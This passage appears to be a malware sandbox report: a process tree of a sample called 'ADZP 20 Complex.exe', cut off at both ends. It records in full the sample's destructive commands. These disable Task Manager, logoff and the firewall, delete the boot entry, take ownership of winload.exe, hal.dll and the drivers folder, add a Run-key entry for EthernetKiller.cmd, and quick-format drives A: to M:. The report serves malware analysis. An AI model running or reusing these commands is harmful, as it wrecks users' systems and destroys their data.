        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:9388
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9452
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        7⤵
        
        PID:9528
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:9612
        
        C:\Windows\SysWOW64\mspaint.exe
        
        mspaint
        7⤵
        
        PID:9660
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:9776
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9864
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        7⤵
        
        PID:9972
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:10040
        
        C:\Windows\SysWOW64\mspaint.exe
        
        mspaint
        7⤵
        
        PID:10096
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        
        PID:10156
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11508
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:8692
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        
        PID:11064
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3340
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3384
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3392
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3412
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3428
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EB87.tmp\EB88.tmp\EB89.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:3952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:3340
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:6384
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:5096
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:4308
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:4936
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:3440
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:4480
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4668
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4892
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:4584
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:5036
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:5492
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:5516
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6708
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6484
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:4308
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        
        PID:7364
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8180
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8764
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8836
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8896
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8944
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9004
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9076
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9160
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9196
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:3624
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:4052
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7392
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8564
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:9304
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:9340
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:9396
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9444
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:9536
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:9628
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:9676
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:9796
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9892
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:9980
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:10052
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:10112
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10164
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12260
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:5988
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:7000
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3440
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3464
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3508
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3564
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3584
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3968
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:4264
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:4328
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        5⤵
        
        PID:4528
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        
        PID:4860
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4716
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:3808
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:4896
    - - C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        5⤵
        
        PID:4328
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        5⤵
        
        PID:4664
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\drivers" /reset /t /c /q
        5⤵
        Modifies file permissions
        
        PID:4624
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
        5⤵
        Views/modifies file attributes
        
        PID:3276
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5788
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5880
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5908
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5920
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5952
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6000
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:6036
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8F16.tmp\8F17.tmp\8F18.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:10864
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:11724
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:12108
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:2756
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:12400
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Modifies file permissions
        
        PID:9480
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:12236
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:12160
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:13360
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:13768
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:13880
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6060
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6076
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:6100
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:6116
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:4328
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A064.tmp\A065.tmp\A066.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:10592
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:12200
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:12168
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:12580
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:13088
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:9928
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:13280
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:6568
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:13524
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5204
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5216
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5264
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:5272
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:4260
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A209.tmp\A20A.tmp\A20B.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:10012
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:11552
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:11664
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:12956
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:13208
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:12280
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:12780
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:13256
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Modifies file permissions
        
        PID:13628
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5384
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5412
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5432
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:3528
    - - C:\Windows\system32\format.com
        
        format /y /q A:
        5⤵
        
        PID:5668
    - - C:\Windows\system32\format.com
        
        format /y /q B:
        5⤵
        
        PID:6332
    - - C:\Windows\system32\format.com
        
        format /y /q D:
        5⤵
        
        PID:6700
    - - C:\Windows\system32\format.com
        
        format /y /q E:
        5⤵
        
        PID:6872
    - - C:\Windows\system32\format.com
        
        format /y /q F:
        5⤵
        
        PID:7116
    - - C:\Windows\system32\format.com
        
        format /y /q G:
        5⤵
        
        PID:6364
    - - C:\Windows\system32\format.com
        
        format /y /q H:
        5⤵
        
        PID:7500
    - - C:\Windows\system32\format.com
        
        format /y /q I:
        5⤵
        
        PID:8828
    - - C:\Windows\system32\format.com
        
        format /y /q J:
        5⤵
        
        PID:10732
    - - C:\Windows\system32\format.com
        
        format /y /q K:
        5⤵
        
        PID:2920
    - - C:\Windows\system32\format.com
        
        format /y /q L:
        5⤵
        
        PID:184
    - - C:\Windows\system32\format.com
        
        format /y /q M:
        5⤵
        
        PID:13536
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:2644
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:2704
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:2632
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:2904
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2912
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:1900
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2664
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2020
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2008
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1568
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {current}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2140
- - C:\Windows\system32\msg.exe
    msg * Virus detectado
    3⤵
    PID:2184
- - C:\Windows\system32\msg.exe
    msg * Virus detectado
    3⤵
    PID:2436
- - C:\Windows\system32\msg.exe
    msg * Has sido hackeado!
    3⤵
    PID:764
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\drivers" /r
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:488
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\drivers" /reset /t /c /q
    3⤵
    - Modifies file permissions
    PID:4272
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
    3⤵
    - Drops file in Drivers directory
    - Views/modifies file attributes
    PID:4304
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4392
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4404
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4412
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4420
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4432
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:4440
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:4452
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FE6B.tmp\FE6C.tmp\FE6D.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:5348
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:5700
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        
        PID:9820
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        
        PID:5728
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        
        PID:5136
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        
        PID:4224
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Modifies file permissions
        
        PID:5224
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        
        PID:6308
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        
        PID:6380
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        
        PID:6516
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        
        PID:6720
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        Views/modifies file attributes
        
        PID:6752
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:6804
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:6820
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:1008
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:10948
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        
        PID:9932
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        
        PID:11716
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:12784
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:13400
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:13432
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:13444
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:13464
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:13516
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:13552
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:13580
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:13604
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:13648
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:13696
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:13720
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:13760
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:13784
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:13808
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:13824
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:13844
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:13872
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:13896
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:13916
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4464
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:4484
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:4492
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    PID:4500
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:4508
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FFA3.tmp\FFA4.tmp\FFA5.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:5484
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:5872
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Modifies file permissions
        
        PID:10072
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        Modifies file permissions
        
        PID:5888
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:5480
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        Views/modifies file attributes
        
        PID:5800
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Modifies file permissions
        
        PID:6176
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        Modifies file permissions
        
        PID:6368
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        
        PID:6428
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        
        PID:6600
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:6744
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        
        PID:6772
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:6888
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:6928
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:7248
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:12132
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        
        PID:12212
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Views/modifies file attributes
        
        PID:12992
    - - C:\Windows\system32\wscript.exe
